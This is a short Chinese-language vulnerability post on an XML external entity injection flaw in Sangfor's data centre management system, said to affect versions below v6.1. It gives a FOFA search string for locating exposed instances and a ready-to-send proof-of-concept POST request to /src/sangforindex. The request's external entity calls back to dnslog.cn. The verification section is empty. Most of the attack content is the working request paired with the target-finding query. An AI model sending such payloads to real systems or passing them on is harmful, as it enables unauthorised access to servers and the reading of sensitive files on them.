0x01产品简介
深信服是数据中心管理系统是DC为AC饿外置数据中心,主要用于海量日志数据的异地扩展备份管理,多条件的组合的高效查询,统计和趋势报表生成,设备运行状态监控等功能。
0x02漏洞概述
深信服是数据中心管理系统DC存在xml外部实体注入漏洞。由于后端对传入的xml对象进行了非预期内解析,攻击者可以利用该漏洞进行xml注入攻击,获取系统敏感信息。
0x03影响范围
v6.1版本以下
0x04漏洞复现
FOFA:"SANGFOR数据中心"
POC:
|
1 2 3 4 5 6 7 8 9 10 11 |
POST /src/sangforindex HTTP/1.1 Host: {{hostname}} Content-Type: text/xml
<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE root [ <!ENTITY rootas SYSTEM "http://dnslog.cn"> ]> <xxx> &rootas; </xxx> |
验证:
